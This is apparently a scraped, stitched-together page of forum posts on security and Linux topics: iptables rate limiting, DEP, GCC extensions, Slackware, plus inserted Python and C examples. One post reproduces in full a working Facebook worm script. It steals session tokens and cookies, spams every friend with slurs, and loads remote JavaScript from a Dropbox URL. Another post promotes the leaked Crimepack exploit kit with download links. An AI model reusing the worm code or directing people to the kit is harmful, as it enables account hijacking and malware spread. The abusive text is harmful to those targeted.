The first rule will accept ping connections at 1 per second, with an initial burst of 1. If this level is crossed, the second rule will log the packet with PING-DROP in the /var/log/message file. The third rule will drop the packet if it tries to cross this limit. The fourth and final rule will allow you to continue the established ping request of an existing connection.

Where,
--limit rate: Maximum average matching rate: specified as a number, with an optional ‘/second’, ‘/minute’, ‘/hour’, or ‘/day’ suffix; the default is 3/hour.
--limit-burst number: Maximum initial number of packets to match: this number gets recharged by one every time the limit specified above is not reached, up to this number; the default is 5.

You need to adjust the --limit-rate and --limit-burst according to your network traffic and requirements. Let us assume that you need to limit incoming connections to the ssh server (port 22) to no more than 10 connections in 10 minutes:

iptables -I INPUT -p tcp -s 0/0 -d $SERVER_IP --sport 513:65535 --dport 22 -m state --state NEW,ESTABLISHED -m recent --set -j ACCEPT
iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 600 --hitcount 11 -j DROP
iptables -A OUTPUT -p tcp -s $SERVER_IP -d 0/0 --sport 22 --dport 513:65535 -m state --state ESTABLISHED -j ACCEPT

Source: Linux Iptables Limit the number of incoming tcp connection / syn-flood attacks
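An added illustration (not from the original article) that replays packet arrival times through a Python model of the `-m limit` match, to show which packets the syn_flood chain and the three ICMP rules above accept, log or drop. It assumes the netfilter limit match behaves as a token bucket holding `--limit-burst` tokens refilled at the `--limit` rate, with each rule keeping its own bucket and LOG being non-terminating; the arrival times are constructed.

```python
RATE_UNITS = {"s": 1, "sec": 1, "second": 1, "m": 60, "min": 60, "minute": 60,
              "h": 3600, "hour": 3600, "d": 86400, "day": 86400}


def parse_rate(spec):
    """'1/s', '3/hour', '10/minute' -> average matching rate in packets per second."""
    count, _, unit = spec.partition("/")
    return float(count) / RATE_UNITS[unit or "hour"]   # iptables defaults to /hour


class LimitMatch:
    """Model of the netfilter `limit` match (assumed token-bucket semantics):
    the bucket starts full with `burst` tokens (--limit-burst), refills at
    `rate` tokens per second (--limit), and a packet matches iff a token is left."""

    def __init__(self, rate, burst):
        self.rate = float(rate)
        self.burst = float(burst)
        self.tokens = self.burst
        self.last = 0.0

    def matches(self, t):
        elapsed = max(0.0, t - self.last)
        self.tokens = min(self.burst, self.tokens + elapsed * self.rate)
        self.last = t
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


def syn_flood_chain(arrivals, limit="1/s", burst=3):
    """Replay SYN arrival times (seconds) through the article's syn_flood chain:
        -A syn_flood -m limit --limit 1/s --limit-burst 3 -j RETURN   (SYN accepted)
        -A syn_flood -j DROP                                           (everything else)
    Returns the verdict per packet."""
    lim = LimitMatch(parse_rate(limit), burst)
    return ["RETURN" if lim.matches(t) else "DROP" for t in arrivals]


def icmp_chain(arrivals, limit="1/s", burst=1):
    """Replay ping arrival times through the article's three ICMP INPUT rules.
    Each -m limit rule keeps its own bucket and LOG does not terminate the
    chain, so only the first excess ping per refill period is logged; later
    ones in the same period are dropped silently. Returns (verdict, logged)."""
    accept_lim = LimitMatch(parse_rate(limit), burst)
    log_lim = LimitMatch(parse_rate(limit), burst)
    results = []
    for t in arrivals:
        if accept_lim.matches(t):           # rule 1: ACCEPT
            results.append(("ACCEPT", False))
            continue
        logged = log_lim.matches(t)         # rule 2: LOG, then fall through
        results.append(("DROP", logged))    # rule 3: DROP
    return results


# Constructed arrival times: a 5-packet burst at t=0, stragglers, then a burst at t=5.
SYN_ARRIVALS = [0.0, 0.0, 0.0, 0.0, 0.0, 0.5, 1.0, 1.2, 5.0, 5.0, 5.0, 5.0]
PING_ARRIVALS = [0.0, 0.0, 0.0, 1.0]

if __name__ == "__main__":
    print(syn_flood_chain(SYN_ARRIVALS))   # 3 RETURN, then DROPs until tokens refill
    print(icmp_chain(PING_ARRIVALS))       # second ping is logged, third is not
```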
  13. I haven't tested it, I'm not into this kind of thing. Be careful, the files may be infected.
  14. Data Execution Prevention (DEP) Systems and Network Analysis Center Information Assurance Directorate Computer attackers commonly use buffer overflow exploits to gain access to computer systems. Many of these malicious code exploits can be prevented with Data Execution Prevention (DEP), a security feature available in modern operating systems. DEP provides protection for all memory that is not specifically marked as executable code. This guide discusses how to configure and enable DEP. Download: http://www.nsa.gov/ia/_files/factsheets/I733-TR-043R-2007.pdf
  15. Yes, the idea is interesting. But the project itself would be fairly complicated. The computers that will crack the MD5s (that would be enough to start with) have to be selected elegantly, and all the possibilities have to be taken into account: what if a computer is supposed to do 1,000,000 attempts and only does one? What if the connection drops and then comes back? It would be quite a bit of work.
  16. Script that gives hackers access to user accounts floods Facebook

A widespread hack spread across Facebook early Thursday morning and shows no signs of abating as of yet. It comes in the form of a script that posts heavily profanity-laden wall posts continuously, instructing you that the only way to remove the posts is to click a 'Remove This App' link. Unfortunately the link is a hoax and allows the malicious script to access your Facebook account. Your account will then continue to spread the script in the form of similarly formatted wall posts on your friends' accounts. The message uses the phrase 'Vote for Nicole Santos', leading some to believe that it is a high school prank related to prom season. Here is a link (Pastebin.com) to the raw code of the script causing the problems on Facebook. If any of you commenters have any suggestions as to how this might have been injected in the first place please do let us know.

Script:

    var message = "Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below.";
    var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
    var myText = "Remove This App";
    var post_form_id = document.getElementsByName('post_form_id')[0].value;
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    var friends = new Array();
    gf = new XMLHttpRequest();
    gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
    gf.send();
    if(gf.readyState!=4){ }else{
        data = eval('(' + gf.responseText.substr(9) + ')');
        if(data.error){ }else{
            friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
        }
    }
    for(var i=0; i<friends.length; i++){
        var httpwp = new XMLHttpRequest();
        var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
        var paramswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message;
        httpwp.open("POST", urlwp, true);
        httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        httpwp.setRequestHeader("Content-length", paramswp.length);
        httpwp.setRequestHeader("Connection", "keep-alive");
        httpwp.onreadystatechange = function(){ if (httpwp.readyState == 4 && httpwp.status == 200){ } };
        httpwp.send(paramswp);
    }
    alert("Failed to remove. Go fuck yourself with a cactus.");
    document.location = "profile.php?id=100000583908715";

Unsurprisingly many are trying to trace the source back to the 'Nicole Santos' who may have originated it, although it's unclear whether this person would be the originator or just a victim of the hack. As of now the only solution seems to be not to click on the link or any link requiring that you 'Verify your account to prevent spam', as this may be how the hack gains access to your Facebook wall in the first place. Simply block the friend sending it to you, as their account is now compromised. Once the problem has been fixed by Facebook you can re-enable them. We will continue to update you on the hack and its effects; check back with this post for more information.

Source: Script that gives hackers access to user accounts floods Facebook ! ~ THN : The Hackers News
  17. Crimepack 3.1.3 Exploit kit

Crimepack 3.1.3 Exploit kit Leaked, available for Download!

Part 1: Java Exploit

As stated above, I focus on a malware that exploits a recent JRE vulnerability, CVE-2010-0840, to execute malicious files on a victim system. This malware comes inside a jar file, which contains the following two classes: Crimepack.class and KAVS.class.

Part 1.1: Crimepack.class

This class is the engine of the malware. It is obfuscated, but you can quickly strip off the obfuscation (my python beta tool is great...); once you get rid of the obfuscation you can see the following code:

As always, we have an Applet that accesses the data parameter, generates a random name for the exe payload that will be dropped in the system temp directory and then executed. So at this point, as you can see, we have nothing new; the above is a common Java downloader... but let's scroll down:

Above, we can see that the malware is creating a new instance of the KAVS class (description follows), in order to trigger the JRE vulnerability by using a call to the getValue() method (..snipped above..).

Part 1.2: KAVS.class

Here is the hand-crafted class. I say hand-crafted because such a class cannot be compiled by using a standard compiler, so you have to edit the compiled class by editing the bytecode:

Part 2: PDF-generator on demand

The kit contains a nice php script that drops custom PDFs on demand, which means that you can have several mutations of the same piece of malware by simply connecting to a malicious link.

Download: http://www.multiupload.com/3HGKHWMRS5

Source: Crimepack 3.1.3 Exploit kit Leaked, available for Download ! ~ THN : The Hackers News

Alternative: http://www.speedyshare.com/files/28425214/Crimepack_3.1.3.zip http://www.megaupload.com/?d=THZ8OW23
  18. Assembly language for Penetration Testers

Below are useful resources for pentesters to learn Assembly language and start learning exploit writing:
• Assembly - SkullSecurity
• Linux Assembly: Programming From the Ground Up (Index of /releases/pgubook)
• Iczelion's Win32 Assembly Homepage
• Art of Assembly Language Programming and HLA by Randall Hyde (the first 5 chapters are enough)
• Intel Developer Manuals: Intel® 64 and IA-32 Architectures Software Developer's Manuals

Assembly Language Primer for Hackers videos:
• Assembly Primer for Hackers (Part 1) System Organization
• Assembly Primer for Hackers (Part 2) Virtual Memory Organization
• Assembly Primer for Hackers (Part 3) GDB Usage Primer
• Assembly Primer for Hackers (Part 4) Hello World
• Assembly Primer for Hackers (Part 5) Data Types
• Assembly Primer for Hackers (Part 6) Moving Data
• Assembly Primer for Hackers (Part 7) Working with Strings
• Assembly Primer for Hackers (Part 8) Unconditional Branching
• Assembly Primer for Hackers (Part 9) Conditional Branching
• Assembly Primer for Hackers (Part 10) Functions
• Assembly Primer for Hackers (Part 11) Functions Stack

Source: Assembly Language | Life of a Penetration Tester
  19. To decrypt or to crack hashes like md5?
  20. I'll get there around 8.
  21. They are trying to identify the author based on the way he writes his code. Apparently he's a professional, of course... http://www.thehackernews.com/2011/05/fingerprinting-author-of-zeus-botnet.html
  22. None. The article presents some GCC compiler extensions that make life easier. At least read part of the article. For example, defining "1 ... 10" to represent any number from 1 to 10. That isn't possible in Visual C++, for example, and is NOT part of the C standard!
  23. nytro@rst:~$ ls -la /var/log/auth.log
-rw-r--r-- 1 syslog adm 1516 2011-05-12 17:20 /var/log/auth.log
I see it's "readable" by anyone...
  24. GCC hacks in the Linux kernel
Discover GCC extensions for the C language
Skill Level: Intermediate
M. Tim Jones, Consultant Engineer, Emulex Corp
18 Nov 2008

The Linux® kernel uses several special capabilities of the GNU Compiler Collection (GCC) suite. These capabilities range from giving you shortcuts and simplifications to providing the compiler with hints for optimization. Discover some of these special GCC features and learn how to use them in the Linux kernel.

GCC and Linux are a great pair. Although they are independent pieces of software, Linux is totally dependent on GCC to enable it on new architectures. Linux further exploits features in GCC, called extensions, for greater functionality and optimization. This article explores many of these important extensions and shows you how they're used within the Linux kernel.

GCC in its current stable version (version 4.3.2) supports three versions of the C standard:
• The original International Organization for Standardization (ISO) standard of the C language (ISO C89 or C90)
• ISO C90 with amendment 1
• The current ISO C99 (the default standard that GCC uses and that this article assumes)

Note: This article assumes that you are using the ISO C99 standard. If you specify a standard older than the ISO C99 version, some of the extensions described in this article may be disabled. To specify the actual standard that GCC uses, you can use the -std option from the command line. Use the GCC manual to verify which extensions are supported in which versions of the standard (see Resources for a link).

Applicable versions
This article focuses on the use of GCC extensions in the 2.6.27.1 Linux kernel and version 4.3.2 of GCC. Each C extension refers to the file in the Linux kernel source where the example can be found.

The available C extensions can be classified in several ways. This article puts them in two broad categories:
• Functionality extensions bring new capabilities from GCC.
• Optimization extensions help you generate more efficient code.

Download: http://download.boulder.ibm.com/ibmdl/pub/software/dw/linux/l-gcc-hacks/l-gcc-hacks-pdf.pdf
Online: http://www.ibm.com/developerworks/linux/library/l-gcc-hacks/index.html
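As an added example (not code from the article or from the kernel source), the following C program shows four GCC extensions of the kind the article covers, including the "1 ... 10" case-range form mentioned earlier in this thread; the macro and function names are my own, and the min() comparison shows why the kernel's version is the safer one.

```c
/* Added example, not from the article or the kernel: GCC C extensions
 * written the way the Linux kernel uses them. */
#include <stdio.h>

/* Kernel-style hint: __builtin_expect keeps the value, only steers the optimizer. */
#define unlikely(x) __builtin_expect(!!(x), 0)

/* Statement expression + __typeof__ (the kernel's min()): each argument
 * is evaluated exactly once, so a side effect in an argument is not doubled. */
#define safe_min(a, b) ({ __typeof__(a) _a = (a); \
                          __typeof__(b) _b = (b); \
                          _a < _b ? _a : _b; })
/* The plain ISO C macro it replaces: (a) appears twice, so it runs twice. */
#define naive_min(a, b) ((a) < (b) ? (a) : (b))

/* Case ranges ("1 ... 10"), the extension mentioned in the thread: not ISO C. */
int classify(int n)
{
    if (unlikely(n < 0))
        return -1;                  /* invalid input */
    switch (n) {
    case 1 ... 10:   return 1;      /* small */
    case 11 ... 100: return 2;      /* medium */
    default:         return 0;      /* zero or too large */
    }
}

/* How many times does each macro evaluate its first argument? */
int evaluations_naive(void)
{
    int calls = 0;
    (void)naive_min(++calls, 100);  /* compare, then select: ++calls runs twice */
    return calls;                   /* 2 */
}
int evaluations_safe(void)
{
    int calls = 0;
    (void)safe_min(++calls, 100);   /* ++calls runs once */
    return calls;                   /* 1 */
}

/* packed drops padding, as the kernel does for wire formats: 5 bytes, not 8. */
struct __attribute__((packed)) hdr { unsigned char type; unsigned int len; };
int packed_size(void) { return (int)sizeof(struct hdr); }

int main(void)
{
    printf("%d %d %d %d\n", classify(7), evaluations_naive(), evaluations_safe(), packed_size());
    return 0;
}
```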
  25. Slackware 13.37

It's true! Slackware 13.37 has been released. Nearly a year in the making, you will appreciate the performance and stability that can only come with careful and rigorous testing. Slackware 13.37 uses the 2.6.37.6 Linux kernel (hence our new $SLACKWARE_VERSION.$KERNEL_VERSION naming system used for this release ;-), and also ships with 2.6.38.4 kernels for those who want to run the latest (and also includes configuration files for 2.6.35.12 and 2.6.39-rc4). The long-awaited Firefox 4.0 web browser is included, and the X Window System has been upgraded (and includes the open source nouveau driver for nVidia cards). The venerable Slackware installer has been improved as well, with support for installing to btrfs (for those who would like to try a new copy-on-write filesystem), a one-package-per-line display mode option, and alienBOB's big surprise: an easy-to-set-up PXE install server that runs right off the DVD!

More details may be found in the official announcement and in the release notes. For a complete list of included packages, see the package list.

Please consider supporting the Slackware project by picking up a copy of the Slackware 13.37 release from the Slackware Store. The discs are off to replication, but we're accepting pre-orders for the official 6 CD set and the DVD. The CD set is the 32-bit x86 release, while the DVD is a dual-sided disc with the 32-bit x86 release on one side and the 64-bit x86_64 release on the other. And, we still have T-shirts (coming soon, a limited edition 13.37 release commemorative black T-shirt with the classic Slackware logo on the front, and a "leet" LILO bootscreen on the back) and other Slackware stuff there, so have a look around.

Thanks to our subscribers and supporters for keeping Slackware going all these years. Thanks are again due to the Slackware crew, the developers of slackbuilds.org, the community on linuxquestions.org, Slackware IRC channels, and everyone else who helped out with this release.

Have fun, and enjoy the new stable release!

Pat and the Slackware crew

Oh, in case our web server that's rather short of RAM goes down, try this link: 1337 Error

Slackware 13.37 for ARM is also available. For details, see: start [slackware ARM]

Source: The Slackware Linux Project